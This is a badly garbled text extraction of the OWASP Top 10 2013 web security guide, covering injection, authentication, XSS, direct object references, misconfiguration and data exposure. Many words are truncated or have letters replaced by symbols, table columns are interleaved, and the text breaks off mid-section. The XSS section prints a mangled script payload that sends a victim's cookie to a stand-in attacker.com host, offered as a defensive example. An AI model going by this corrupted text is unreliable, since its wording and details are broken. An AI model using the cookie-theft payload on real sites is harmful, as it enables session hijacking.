(251289837) OWASP Top 10 - 2013.doc

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

1/39

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

2/39

O About OWASPoreword

secure software is undermining our financial,althcare, defense, energy, and other criticalrastructure. As our digital infrastructure gets

creasingly complex and interconnected, theiculty of achieving application securityreases exponentially. We can no longer affordtolerate relatively simple security problemse those presented in this OWA! "op #$.

e goal of the "op #$ pro%ect is to raisewareness about application security byentifying some of the most critical riskscing organi&ations. "he "op #$ pro%ect iserencedmany standards, books, tools, and

gani&ations, including 'I"(), !*I +, +IA,*, andm a n y mor e. "his release of theOWA!p #$ marks this pro%ect-s tenth anniversary ofsing awareness of the importance ofplication security risks. "he OWA! "op #$ wasst released in $$/, with minor updates in$0 and $$1. "he $#$ version was revampedprioriti&e by risk, not %ust prevalence. "his

#/ edition follows the same approach.

e encourage you to use the "op #$ to get yourgani&ation s t a rted with application security.velopers can learn from the mistakes of other

gani&ations. )xecutives should start thinkingout how to manage the risk that softwareplications create in their enterprise.

the long term, we encourage you to create anplication security program that is compatible

th your culture and technology. "heseograms come in all shapes and si&es,d you should avoid attempting to doerything prescribed by some process model.stead, leverage yourgani&ation-s existing strengths to do andeasure whatrks for you.

e hope that the OWA! "op #$ is useful to yourplication security eorts. !lease don-t hesitate

contact OWA! with your 2uestions,mments, and ideas, either publicly to

o w as p 3t op te n 4 lis t s .o w asp.org orprivately to d a ve.w icher s 4o w asp.or g.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

3/39

bout OWASP

Open Web Application ecurity !ro%ectWA!6 is an open community dedicated to

bling organi&ations to develop, purchase,maintain applications that can be

sted. At OWA! you-ll find free and open

Application security tools and standards*omplete books on application securitysting, securecode development, and secure code reviewtandard security controls and libraries8o cal ch ap ters world wide*utting edge research) xten sive conferen ces worldwide'ailin g lists

rn more at9 h t tp s 9::www .o w asp.org

of the OWA! tools, documents, forums, andpters are free and open to anyonerested in improving application security. We

advocate approaching application security as apeople, process, and technology problem,because the most eective approaches toapplication security re2uire improvements in allof these areas.

OWA! is a new kind of organi&ation. Our freedofrom commercial pressures allows us to provideunbiased, practical, cost3eective informationabout application security. OWA!

is not affiliated with any technology company,although we support the informed use ofcommercial security technology. imilar to manyopen source software pro%ects, OWA! producesmany types of materials in a collaborative, openway.

"he OWA! oundation is the non3profit entitythat ensures the pro%ect-s long3term success.Almost everyone associated with OWA! is avolunteer, including the OWA! ;oard, $$/ ? $#/ "he OWA! oundation

"his document is released under the *reative *ommons Attribution hareAlike /.$

cense. or any reuseor distribution, you must make it clear to others the license terms of this work.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

4/39

I Introduction

Welcome

elcome to the OWA! "op #$ $#/= "his update broadens one of the categories from the $#$rsion to be more inclusive of common, important vulnerabilities, and reorders some of the otherssed on changing prevalence data. It also brings componentsecurity into the spotlight by creating aecific category for this risk, pulling it out of the obscurity of the fine print of the $#$ risk A@9 ecurisconfiguration.

e OWA! "op #$ for $#/ is based on datasets from 1 firms that speciali&e in applicationcurity, including 0 consulting companies and / tool:aa vendors 5# static, # dynamic, and # withth6. "his data spans over B$$,$$$ vulnerabilities across hundreds of organi&ations and thousandsapplications. "he "op #$ items are selected and prioriti&ed according to this prevalence data, inmbination with consensus estimates of exploitability, detectability, and impact estimates.

e primary aim of the OWA! "op #$ is to educate developers, designers, architects, managers,d organi&ations about the conse2uences of the most important web application securityaknesses. "he "op #$ provides basic techni2ues to protect against these high risk problem areasnd also provides guidance on where to go from here.

Warnings

ont stop at !. "here are hundreds of issuesat could affect the overall security of a webplication as discussed in the OW A ! + eve lops < u ide and the OW A ! * h e at h eet e ries.ese are essential reading for anyone

velopingb applications.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

5/39

ttribution

nks to A s p e ct e c u rity for initiating,ding, and updating the OWA! "op #$ sincenception in $$/, and to its primary authors9Williams and +ave Wichers.

d like to thank those organi&ations thattributed their vulnerability prevalence dataupport the $#/ update9

A s p e ct e c u rity ? t a tistics H ! ? ta tistics from both ortify andWebInspect

'ind ed ecu rity ? ta tistics ofttek ? ta tistics"rustwave, pider8ab s ? tatistics 5eepage B$6

Feracod e ? ta tistics

Wh iteHa t ecu rity In c. ? ta tistics

We would like to thank everyone who contributedto previous versions of the "op #$. Without thesecontributions, itwouldn-t be what it is today. We-d also like tothank those who contributed significantconstructive comments and time reviewing thisupdate to the "op #$9

Adam ;aso 5Wikimedia oundation6

'ike ;oberski 5;oo& Allen Hamilton6

"orsten

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

6/39

'( 'elease (otes

What Changed From )!! to )!*+

e threat landscape for applications security constantly changes. Key factors in this evolution arevances made by attackers, the release of new technologies with new weaknesses as well as moreilt in defenses, and the deployment of increasingly complex systems. "o keep pace, we periodicallydate the OWA! "op #$. In this $#/ release, we made the following changes9

;roken Authentication and ession 'anagement moved up in prevalence based on our data set.We believe this is probably because this area is being looked at harder, not because these issuesare actually more prevalent. "his caused (isks A and A/ to switch places.

*ross3ite (e2uest orgery 5*(6 moved down in prevalence based on our data set from $#$3AB to $#/3A. We believe this is because *( has been in the OWA! "op #$ for @ years, andorgani&ations and framework developers have focused on it enough to signiLcantly reduce the

number of *( vulnerabilities in real world applications.

We broadened ailure to (estrict J(8 Access from the $#$ OWA! "op #$ to be more inclusive9

M $#$3A9 ailure to (estrict J(8 Access is now $#/ 3A19 'iss in g un ction 8 eve l Acc es s *o n tr o l to cover all of function level access control. "here are many ways to specify which function isbeing accessed, not %ust the J(8.

We merged and broadened $#$3A1 N $#$3A to *()A")9 $#/ 3A@9 e n s itiv e +a t a ) x p o s u r e 9

? "his new category was created by merging $#$3A1 ? Insecure *ryptographic torage N $#$A 3 Insuicient "ransport

8ayer !rotection, plus adding browser side sensitive data risks as well. "his new category coversensitive dataprotection 5other than access control which is covered by $#/3A0 and $#/3A16 from themoment sensitive data isprovided by the user, sent to and stored within the application, and then sent back to the browagain.

We added9 $#/ 3A9 Js in g K n o w n F u ln e ra b le *o m p o n e n t s 9

M "his issue was mentioned as part of $#$3A@ ? ecurity 'isconfiguration, but now has acategory of its own as the growth and depth of component based development hassigniLcantly increased the risk of using known vulnerable components.

OWASP "op ! , )!! -Pre$ious. OWASP "op! , )!* -(ew.

, In/ection A , In/ection

* , 0ro#en Authentication and Session 1anagement A) , 0ro#en Authenticatid Session 1anagement

, Cross2Site Scripting -3SS. A* , Cross2Siteripting -3SS.

4 , Insecure Direct Ob/ect 'e&erences A4 , Insecure Directb/ect 'e&erences

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

7/39

5 , Security 1iscon&iguration A6 , Securityscon&iguration

7 , Insecure Cryptographic Storage , 1erged with A8 A5 , Sensiti$e Data 9:posure

; , Failure to 'estrict %'L Access , 0roadened into A7 , 1issing Function Le$elcess Control

6 , Cross2Site 'e

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

8/39

Whats 1y 'is#+

OWA! " op #$ focuses on identifying the most serious risks forroad array oforgani&ations. or each of these risks, we provideeric information about likelihood and technical impact using the

owing simple ratings scheme, which is based on the OWA! (is kn g 'et h o d olog y.

'e&erences

OWASP

OWA! (is k (a t in g' e t h o d ology

Article o n "hr e a t :(is k ' od el

9:ternal AI( In forma t ion (is k ramework

'icro s o ft " h r e at 'o d e ling 5"(I+)and +()A+6

ly y ou know the specifics of your environment and yoursiness. or any given application, there may not be a threatent that can perform the relevant attack, or the technicalpact may not make any dierence to your business. "herefore,u should evaluate each risk for y o u r se lf , focusing on the threatents, security controls, and business impacts in your enterprise.e list "hreat Agents as Application pecific, and ;usinesspacts as Application : ;usiness pecific to indicate these arearly dependent on the details about your application in your

terprise.e names of the risks in the "op #$ stem from the type ofack, the type of weakness, or the type of impact they cause.

e chose names that accuratelyflect the risks and, where possible, align with commonrminology most likely to raise awareness.

"

!

OWASP "op !Application

ecurity 'is#s ,)!*

A ,In/ection

In%ection Caws, such as P8, O, and 8+A! in%ection occur when untrusteddata is sent to an interpreter as part of a command or 2uery. "he attacker-shostile data can trick the interpreter into executing unintended commands oraccessing data without proper authori&ation.

A) , 0ro#enAuthentication and Session1anagement

Application functions related to authentication and session management areoften not implemented correctly, allowing attackers to compromise passwords

keys, or session tokens, or to exploit other implementation Caws to assumeother users- identities.

A* , Cross2SiteScripting-3SS.

Q flaws occur whenever an application takes untrusted data and sends it toa web browser without proper validation or escaping. Q allows attackers toexecute scripts in the victim-s browser which can hi%ack user sessions, defaceweb sites, or redirect the user to malicious sites.

A4 , Insecure Direct Ob/ect 'e&erences

"hreatAgents

Attac#ectors

Wea#ness

Wea#ness

"echnical

0usiness

AppSpeci&

ic

)asy Widesprea )asy evereApp

0usiness

Average *ommon Average 'oderate

+iRcult Jncommon +iRcult 'inor

A

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

9/39

rect ob%ecterence occursen a developer

exposes a reference to an internal implementation ob%ect, such as a file,directory, or database key. Without an access control check or other protectioattackers can manipulate these references to access unauthori&ed data.

A6 ,Security

1isconBguration

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

10/39

A In/ection"hreatAgents

Attac#ectors

SecurityWea#ness

"echnicalImpacts

0usinessImpacts

plication Speci&icploitability

9AS

Pre$alenceCO11O(

Detectability

A9'AE9

ImpactS99'9

Application 0usinesSpeci&ic

nsideryone who sendrusteda to thetem,udingernalrs, internalrs, and

ministrators

Attacker sendssimple text3based attacksthat exploit thesyntax of thetargetedinterpreter.Almost anysource of datacan be an

in%ectionvector,includinginternalsources.

In %e c tio n Ca w s occur when anapplication sends untrusted datato an interpreter. In%ection Cawsare very prevalent, particularly inlegacy code. "hey are oftenfound in P8, 8+A!, Qpath, orEoP8 2ueriesS O commandsSQ'8 parsers,'"! Headers, programarguments, etc. In%ection Caws

are easy to discover whenexamining code, but fre2uentlyhard to discover via testing.canners and fu&&ers can helpattackers Lnd in%ection Caws.

In%ection canresult in dataloss orcorruption, lackofaccountability,or denial ofaccess.In%ection cansometimes

lead tocomplete hosttakeover.

*onsider thebusiness valuof the aectedata and theplatformrunning theinterpreter. Adata could bestolen,modified, or

deleted. *oulyourreputation beharmedT

m I ulnerable "on/ection+

e best way to find out if an application islnerable to in%ection is to verify that all useinterpreters clearly separates untrusted datam the command or 2uery. or P8 calls, this

eans using bind variables in all prepared

atements and stored procedures, andoiding dynamic 2ueries.

ecking the code is a fast and accurate way toe if the application uses interpreters safely.de analysis tools can help a security analystd the use of interpreters and trace the dataw through the application. !enetration testersn validate these issues by crafting exploits thatnfirm the vulnerability.

tomated dynamic scanning which exercisese application may provide insight into whetherme exploitable in%ection flaws exist. cannersnnot always reach interpreters and haveiculty detecting whether an attack wasccessful. !oor error handling makes in%ectionws easier to discover.

ow Do I Pre$ent In/ection!reventing in%ection re2uires keepinguntrusted data separate from commandsand 2ueries.

#. "he preferred option is to use a safe A!I whiavoids the use of the interpreter entirely orprovides a parameteri&ed interface. ;ecareful with A!Is, such as stored proceduresthat are parameteri&ed, but can still introducin%ection under the hood.

. If a parameteri&ed A!I is not available,you should carefully escape specialcharacters using the specific escapesyntax for that interpreter. OWA!- s )A!I provides many of these es ca p in gr ou tin e s.

/. !ositive or Dwhite listG input validation is alsrecommended, but is n ot a complete defensas many applications re2uire specialcharacters in their input. If special characterare re2uired, only approaches #. and . abovwill make their use safe. OWA!- s ) A!Ihas an extensible library of w h ite lis t inpu tv alid a t ion r ou tin e s.

:ample Attac# Scenariose n ario U # 9 "he application uses untrustedta in the construction of the followingln e ra b le P8 call9

tring

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

11/39

e&erencesWASP

WA! P8 In %e c tio n !re ve n tio n *heat h eet

WA! P u e ry ! aram e teri& a tio n * h e at h eet

WA! *o mm a n d In %e c tio n Article

WA! Q'8 e Qtern a l )n tit y 5Q Q ) 6 ( efe r e n cecle

AF 9 O u t pu t )n co d in g: ) s ca p in g ( e 2u ir eme n t5F @6

OWA! "es tin g < u id e 9 *h ap ter on P8 In %e c tio n"es ting

9:ternal

*W) ) n try 11 on *o mm a n d In %e c tion

*W) ) n try on P8 In %e c tion

*W) ) n try B@0 on H ib e r n a t e In %e c tion

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

12/39

0ro#en AuthenticationandSession 1anagement

"hreatAgents

Attac#

ectors

SecurityWea#ness

"echnic

alImpacts

0usinessImpacts

plication Speci&icploitability

A9'AE9

Pre$alence

WID9SP'9AD

Detectability

A9'AE9

ImpactS99'9

Application 0usinesSpeci&ic

nsideronymousernalackers,

well as usersh their ownounts, whoy attemptstealounts fromers. Alsosiderdersnting toguise theirons.

Attacker usesleaks or flaws intheauthenticationor sessionmanagement

functions 5e.g.,exposedaccounts,passwords,session I+s6 toimpersonateusers.

+evelopers fre2uently buildcustom authentication andsession management schemes,but building these correctly ishard. As a result, these customschemes fre2uently have Caws in

areas such as logout, passwordmanagement, timeouts,remember me, secret 2uestion,account update, etc. inding suchCaws can sometimes be diicult,as each implementation isuni2ue.

uch Caws mayallowsome oreven allaccounts to beattacked. Oncesuccessful, the

attacker can doanything thevictim could do.!rivilegedaccounts arefre2uentlytargeted.

*onsider thebusiness valuof theaectedata orapplicationfunctions.

Also considerthe businessimpact ofpublicexposure ofthevulnerability.

m I ulnerable to

i/ac#ing+e session management assets like useredentials and session I+s properlyotectedT ou may be vulnerable if9

Jser authentication credentials aren-totected whenstored using hashing or encryption.

ee A@.

*redentials can be guessed or overwrittenthrough weak account managementfunctions 5e.g., account creation, changepassword, recover password, weak session

I+s6.ession I+s are exposed in the J(8 5e.g.,(8 rewriting6.

ession I+s are vulnerable to sess iona t ion attacks.

ession I+s don-t timeout, or user sessionsor authentication tokens, particularly singlesign3on 5O6 tokens, aren-t properlyinvalidated during logout.ession I+s aren-t rotated after successful

gin.

!asswords, session I+s, and othercredentials are sent over unencrypted

connections. ee [email protected] the AF re2uirement areas F and F/ forore details.

ow Do I Pre$ent "his+"he primary recommendation for anorgani&ation is to make available to developers9

A single set o& strong authentication asession

management controls. uch controls shoustrive to9

a6 meet all the authentication and sessionmanagement re2uirements defined inOWA!-s A pp lica t ion e c u rityF e rificatio n t and ard 5AF6 areas F5Authentication6 and F/ 5ession'anagement6.

b6 have a simple interface for develope*onsider the ) A!I A u t h e n tica t or a n d JsA!Is as good examples to emulate, use, build upon.

. trong eorts should also be made toavoid Q flaws which can be used to stealsession I+s. ee A/.

A

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

13/39

:ample Attac# Scenariose n ario U # 9 Airline reservations applicationpports J(8writing, putting session I+s in the J(89

t tp > e:a mp lec om sa le sa le it emsM/sessiondGP!OC)S(DLPS@C%()+destGawaii

authenticated user of the site wants to let friends know about the sale. He e3mails the

ove link without knowing he is also givingway his session I+. When his friends use thek they will use his session and credit card.

e n ario U 9 Application-s timeouts aren-t setoperly. Jser uses a public computer to accesse. Instead of selecting DlogoutG the user simplyses the browser tab and walks away. Attackeres the same browser an hour later, and thatowser is still authenticated.

e n ario U / 9 Insider or external attacker gainscess to the system-s password database.er passwords are not properly hashed,posing every users- password to the attacker.

'e&erencesOWASP

or a more complete set of re2uirements andproblems to avoid in this area, see the AFr e 2u ir eme n ts ar e as for A u t h e n tica t ion 5F 6an d ess ion 'a n age me n t 5F / 6.

OWA! A u t h e n tica t ion *heat h eet

OWA! orgot ! a ssw ord * h e at h eet

OWA! ess ion 'a n age me n t *heat h eet

OWA! + eve lo p me n t < u id e 9 *h ap ter o nA u t h e n tica t ion

OWA! "es tin g < u id e 9 *h ap ter on A u t h e n tica ti

9:ternal

*W) ) n try 1 on Impr op e r A u t h e n tica t ion

*W) ) n try /0 on ess ion ixa tion

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

14/39

A* Cross2Site Scripting-3SS.

"hreatAgents

Attac#ectors

SecurityWea#ness

"echnicalImpacts

0usinessImpacts

plication SpeciBcploitability

A9'AE9

Pre$alence

9'WID9SP'9AD

Detectability9AS

Impact

1OD9'A"9

Application

0usinessSpeci&ic

nsideryone who sendrusteda to thetem,udingernalrs, internalrs, and

ministrators

Attacker sendstext3 basedattack scripts

that exploit theinterpreter inthe browser.Almostany source ofdatacan be anattackvector,includinginternal sourcessuch as datafromthe database.

Q is the most prevalent webapplication security Caw. Qflaws occur when an application

includes user supplied datain a

page sent to the browser withoutproperly validating or escapingthat content. "here are threeknowntypes of Q flaws9 #6tor e d, 6 ( ef le cte d,and /6 +O'b as e d Q .

+etection of most Q flaws isfairly easyvia testing or code analysis.

Attackers canexecute scriptsin a victim-s

browser tohi%ack usersessions, defaceweb sites, inserthostile content,redirect users,hi%ack the user-sbrowserusing malware,etc.

*onsider thebusiness valuof the aecte

system and athe data itprocesses.

Also considerthe businessimpact ofpublicexposure ofthevulnerability.

m I ulnerable to 3SS+u are vulnerable if you do not ensure that aller supplied input is properly escaped, or you dot verify it to be safe via input validation, before

cluding that input in the output page. Withoutoper output escaping or validation, such inputl be treated as active content in the browser. If

axbeing used to dynamically update the page,e you using s afe a v acrip t A!IsT or unsafevacript A!Is, encoding orlidation must also be used.

tomated tools can Lnd some Q problems

tomatically. However, each application buildstput pages dierently and uses dierentowser side interpreters such as avacript,tiveQ, lash, and ilverlight, makingtomated detection diicult. "herefore,mplete coverage re2uires a combination ofanual code review and penetration testing, indition to automated approaches.

eb .$ technologies, such as A%ax, make Quch more diicult to detect via automatedols.

ow Do I Pre$ent 3SS+!reventing Q re2uires separation ofuntrusted data from active browser content.

#. "he preferred option is to properly escape aluntrusted data based on the H"'8 context5body, attribute, avacript, *, or J(86 thathe data will be placed into. ee the OWA!Q !re ve n tio n * h e at h ee t for details onthe re2uired data escaping techni2ues.

. !ositive or DwhitelistG input validation is alsorecommended as it helps protect against Qbut is n ot a comple te d efe n s e as manyapplications re2uire special characters in the

input. uch validation should, as much aspossible, validate the length, characters,format, and business rules on that data befoaccepting the input.

/. or rich content, consider auto3saniti&ationlibraries like

OWA!-s An tiamy or the ava H "'8 an iti&!ro %ect.

0. *onsider *o n tent e c u rity ! o licy 5 * !6 todefend against

Q across your entire site.

:ample Attac# Scenarioe application uses untrusted data in thenstruction of the following H"'8 snippetthout validation or escaping9

-String. page KG H=input

nameGJcreditcardJ typeGJ"93"Q$alueGJH K re

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

15/39

e attacker modifies the V**- parameter in hisowser to9

?=script?documentlocationG ttp > ww watt ac #er comcgi 2incoo #iecgi+ooGJKdocumentcoo#ie=script?J.

is causes the victim-s session I+ to be sent toe attacker-s website, allowing the attacker toack the user-s current session.

te that attackers can also use Q to defeaty automated *( defense the application

ght employ. ee A for info on *(.

'e&erencesOWASP

OWA! Q !re ve n tio n *heat h eet

OWA! +O' b as e d Q !re ve n tio n *heat h ee

OWA! *ro ss3ite cripting Article

) A!I )n co d e r A!I

AF 9 O u t pu t )n co d in g:) s ca p in g ( e 2u ir eme n t5F @6

OWA! A n tia m y 9 a n iti& a tio n 8ib rary

"es tin g < u ide9 # s t / * h a p t e rs on +ata Falid atio"es ting

OWA! *o d e ( ev ie w < u id e 9 *h ap ter o n Q( ev iew

OWA! Q ilter ) v as ion *heat h eet

9:ternal

*W) ) n try 1 on *ro s s 3ite crip ting

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

16/39

A4 nsecure DirectOb/ect 'e&erences

"hreatAgents

Attac#ectors

SecurityWea#ness

"echnicalImpacts

0usinessImpacts

plication Speci&icploitability

9AS

Pre$alenceCO11O(

Detectability9AS

Impact

1OD9'A"9

Application 0usinesSpeci&ic

nsider thees of users

yourtem. +oy users havey partialess totain typesystemaT

Attacker, whois anauthori&edsystem user,simply changesa parametervalue thatdirectly refersto a systemob%ect toanother ob%ectthe user isn-tauthori&ed for.Is accessgrantedT

Applications fre2uently use theactual name or key of an ob%ectwhen generating web pages.Applications don-t always verifythe user is authori&ed for thetarget ob%ect. "his results in aninsecure direct ob%ect referenceflaw. "esters can easilymanipulate parameter values todetect such Caws. *ode analysis2uickly shows whetherauthori&ation is properly verified.

uch Caws cancompromise allthe data thatcan bereferenced bythe parameter.Jnless ob%ectreferences areunpredictable,it-s easy for anattacker toaccess allavailable dataof that type.

*onsider thebusiness valuof the expose

data.Also considerthe businessimpact ofpublicexposure ofthevulnerability.

m I ulnerable+e best way to find out if an application is

lnerable to insecure direct ob%ect referencesto verify that all ob%ect references havepropriate defenses. "o achieve this,nsider9

or direct references to restrictedresources, does the application fail to verifythe user is authori&ed to access the exactresource they have re2uestedT

If the reference is an indirect reference,does the mapping to the direct reference failto limit the values to those authori&ed for thecurrent userT

de review of the application can 2uickly verify

ether either approach is implemented safely.sting is also eective for identifying direct%ect references and whether they are safe.tomated tools typically do not look for suchws because they cannot recogni&e what2uires protectionor what is safe or unsafe.

ow Do I Pre$ent "his+!reventing insecure direct ob%ect references

re2uires selecting an approach for protectingeach user accessible ob%ect 5e.g., ob%ectnumber, Llename69

%se per user or session indirect ob/ectre&erences."his prevents attackers fromdirectly targeting unauthori&ed resources.or example, instead of using the resource-sdatabase key, a drop down list of sixresources authori&ed for the current usercould use the numbers # to @ to indicatewhich value the user selected. "heapplication has to map the per3user indirectreference back to the actual database key othe server. OWA!-s ) A!I includes bothse2uential and random access referencemaps that developers can use to eliminatedirect ob%ect references.

) Chec# access. )ach use of a direct ob%ectreference from an untrusted source mustinclude an access control check to ensure thuser is authori&ed for the re2uested ob%ect.

:ample Attac# Scenarioe application uses unverified data in a8 call that is accessing accountormation9

tring e:a mp lec om a p pa c c ou n tI n&o+acctGnotmyacct

I

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

17/39

e&erencesWASP

WA! " op # $ 3$$1 on In se c u re +ir O b %e c ter e n c es

A!I Acc es s ( efe r e n ce 'ap A!I

A!I Acc es s *o n tr o l A!I -SeethoriTedForData-.RthoriTedForFile-.R

thoriTedForFunction-. .

or additional access control re2uirements, seethe AFre2u irements area for Access *on tro l 5F06.

9:ternal

*W) ) n try @/ on In se c u re +ir e ct O b %e c t( efe r e n c es

*W) ) n try on ! a th " ra ve r s al -an e:ample o& Direct Ob/ect'e&erence attac#.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

18/39

A6 Security1iscon&iguration

"hreatAgents

Attac#ectors

SecurityWea#ness

"echnicalImpacts

0usinessImpacts

plication Speci&icploitability

9AS

Pre$alenceCO11O(

Detectability9AS

Impact

1OD9'A"9

Application 0usinesSpeci&ic

nsideronymous

ernalackerswell as usersh their ownounts thaty attempt to

mpromise thetem. Alsosiderders wanting

disguise theirons.

Attackeraccessesdefault

accounts,unused pages,unpatchedflaws,unprotectedfiles anddirectories, etc.to gainunauthori&edaccessto or knowledgeofthe system.

ecurity misconfiguration canhappen at any level of anapplication stack, including the

platform, web server, applicationserver, database, framework, andcustom code. +evelopers andsystem administrators need towork together to ensure that theentire stack is configuredproperly. Automated scanners areuseful for detecting missingpatches, misconfigurations, useof defaultaccounts, unnecessary services,etc.

uch Cawsfre2uently giveattackers

unauthori&edaccess to somesystemdata orfunctionality.Occasionally,suchflaws result in acompletesystemcompromise.

"he systemcould becompletely

compromisedwithout youknowing it. Alof your datacould be stoleor modifiedslowly overtime.

(ecovery costcould beexpensive.

m I ulnerable to Attac#+your application missing the propercurity hardening across any part of theplication stackT Including9

Is any of your software out of dateT "hisincludes the O, Web:App erver, +;',applications, and all code libraries -seenew A8..Are any unnecessary features enabled or

installed 5e.g., ports, services, pages,accounts, privileges6T

Are default accounts and their passwordsstill enabled and unchangedT

+oes your error handling reveal stacktraces or other overly informative errormessages to usersT

Are the security settings in your developmentframeworks 5e.g., truts, pring, A!.E)"6 andlibraries not set to secure valuesT

thout a concerted, repeatableplication security configuration process,stems are at a higher risk.

ow Do I Pre$ent "his+"he primary recommendations are toestablish all of the following9

#. A repeatable hardening process that makesit fast and easy to deploy anotherenvironment that is properly locked down.+evelopment, PA, and productionenvironments should all be configuredidentically 5with dierent passwords used ineach environment6. "his process should beautomated to minimi&e the eort re2uiredto setup a new secure environment.

. A process for keeping abreast of anddeploying all new software updates andpatches in a timely manner to each deployedenvironment. "his needs to include all codelibraries as well -see new A8..

/. A strong application architecture thatprovides eective, secure separationbetween components.

0. *onsider running scans and doing auditsperiodically to help detect futuremisconfigurations or missing patches.

:ample Attac# Scenariose n ario U # 9 "he app server admin console istomatically installed and not removed. +efault

counts aren-t changed. Attacker discovers theandard admin pages are on your server, logswith default passwords, and takes over.

e n ario U 9 +irectory listing is not disabled onur server. Attacker discovers she can simply list

directories to Lnd any file. Attacker finds anddownloads all your compiled ava classes, whicshe decompiles and reverse engineers to get ayour custom code. he then Lnds a seriousaccess controlflaw in your application. ce n ario U / 9 App server configuration allowsstack traces to be returned to users, potentiallexposing underlying flaws. Attackers love theextra information error messages provide.

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

19/39

e n ario U 0 9 App server comes with sampleplications that are not removed from youroduction server. aid sample applications havell known security flaws attackers can use tompromise your server.

'e&erencesOWASP

OWA! + eve lo p me n t < u id e 9 *h ap ter o n*o n figu r a tion

OWA! *o d e ( ev ie w < u id e 9 *h ap ter o n ) rr o rH a nd ling

OWA! "es tin g < u id e 9 *o n figu r a t ion 'a n age m

OWA! "es tin g < u id e 9 "es tin g f or ) rr o r *o d es

OWA! " op #$ $$0 3In se c u re *o n figu r a t ion'a n age me nt

or additional re2uirements in this area, see theAFre2uiremen ts area for ecurity *onfigu ratio n5F#6.

9:ternal

!* ' a ga & in e Ar t icle o n W e b er ve r H ar d e n ing

*W) ) n try o n )n v iro n me n t a l e c u rity la ws

*I e c u rity *o n figu r a t ion < u id es :; e n c h m arks

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

20/39

A5 Sensiti$e Data9:posure

"hreatAgents

Attac#ectors

SecurityWea#ness

"echnicalImpacts

0usinessImpacts

plication Speci&icploitability

DIFFIC%L"

Pre$alence

%(CO11O(

Detectability

A9'AE9

ImpactS99'9

Application

0usinessSpeci&ic

nsider who gain access

yoursitive datad anykups of thata. "hisudes thea at rest, innsit, anden in yourtomers-wsers.ude bothernal andernal threats.

Attackerstypically don-tbreak cryptodirectly. "heybreaksomething else,suchas stealkeys, do man3in3the3 middleattacks, or stealclear text dataoff the server,whilein transit, orfromthe user-sbrowser.

"he most common flaw is simplynot encrypting sensitive data.When crypto is employed, weakkey generation andmanagement, and weakalgorithm usage is common,particularly weak passwordhashing techni2ues. ;rowserweaknesses are very commonand easy to detect, but hard toexploit on a large scale. )xternalattackers have diicultydetecting server side Caws dueto limited access and they arealso usually hard to exploit.

ailurefre2uentlycompromisesall data thatshould havebeenprotected.

"ypically, thisinformationincludessensitive datasuch as healthrecords,credentials,personal data,credit cards,etc.

*onsider thebusiness valuof the lost datand impact toyourreputation.What is yourlegal liability this data isexposedT Alsoconsider thedamage to yoreputation.

m I ulnerable to Data:posure+e first thing you have to determine is whichta is sensitive enough to re2uire extraotection. or example, passwords, credit cardmbers, health records, and personal

ow Do I Pre$ent "his+"he full perils of unsafe cryptography, 8 usagand data protection are well beyond the scope othe "op #$. "hat said, for all sensitive data, do aof the following, at a minimum9

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

21/39

ormation should be protected. or all such data9

Is any of this data stored in clear text longterm, including backups of this dataT

Is any of this data transmitted in clear text,internally or externallyT Internet traic is

#. *onsidering the threats you plan to protectthis data from 5e.g., insider attack, externaluser6, make sure you encrypt all sensitivedata at rest and in transit in a manner thatdefends against these threats.

. +on-t store sensitive data unnecessarily.+iscard it as soon as possible. +ata you

Are any old : weak cryptographic algorithms /. )nsure strong standard algorithms and

Are weak crypto keys generated, or isproper key management or rotationmissingT

Are any browser security directives or headersmissing when sensitive data is provided by :sent to the browserT

d more 7 or a more complete set of problemsavoid,e AF areas *ryp to 5F16, +at a !ro t. 5F6, an d8 5F#$6.

:ample Attac# Scenariose n ario U # 9 An application encrypts credit cardmbers in a database using automatic databasecryption. However, this means it also decrypts

s data automatically when retrieved, allowingP8 in%ection Caw to retrieve credit cardmbers in clear text. "he system should havecrypted the creditrd numbers using a public key, and onlyowed back3endplications to decrypt them with the privatey.

e n ario U 9 A site simply doesn-t use 8 forauthenticated pages. Attacker simply

onitors network traic 5like an open wirelesstwork6, and steals the user-s session cookie.tacker then replays this cookie and hi%acks theer-s session, accessing the user-s privateta.

e n ario U / 9 "he password database usessalted hashes to store everyone-s passwords.Lle upload flaw allows an attacker to retrievee password Lle. All of the unsalted hashes canexposed with a rainbow table of precalculatedshes.

used, and proper key management is in plac*onsider

using I! #0$ valid atedcryp to graph ic modu les.

0. )nsure passwords are stored with analgorithm specifically designed forpassword protection, such as b cr ypt,!;K+ , or s cr ypt.

B. +isable autocomplete on forms collectingsensitive data and disable caching for pagesthat contain sensitive data.

'e&erencesOWASP 2 or a more complete set ofre2uirements, seeAF re2 - ts o n *ryp to grap h y 5F16, +at a!ro tection 5FO6 and*ommun ication s ecu rity 5F#$6

OWA! *ry p t o gra ph ic t o rage *heat h eet

OWA! ! a ssw ord torage *heat h eet

OWA! " ra n s p ort 8 ay e r !r o tection * h e at h ee

OWA! "es tin g < u id e 9 *h ap ter on 8: " 8"es ting

9:ternal

*W) ) n try /#$ on *ry p t o gra ph ic Iss u es

*W) ) n try /# on * le artext torage of ens itivIn forma tion

*W) )n try /# on * le artext " ra n sm iss ion o fens itiveIn formation

*W) ) n try /@ on Weak )n cr yp tion

8/11/2019 (251289837) OWASP Top 10 - 2013.doc

22/39

1issing Function Le$elAccessControl

"hreatAgents

Attac#

ectors

SecurityWea#ness

"echnic

alImpacts

0usinessImpacts

plication Speci&icploitability

9AS

Pre$alenceCO11O(

Detectability

A9'AE9

Impact

1OD9'A"9

Application 0usinesSpeci&ic

yone withwork access send your

plication auest. *ould

